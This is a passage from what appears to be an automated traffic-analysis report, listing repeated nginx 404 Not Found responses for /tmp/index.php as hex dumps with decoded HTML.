75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 63 42 f3 31 04 ed f1 49 f6 9d ed e4 21 9b 23 9a e8 31 55 12 c3 89 9b c2 63 9a 3b 0d 16 Data Ascii: #\6cB1I!#1Uc;
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 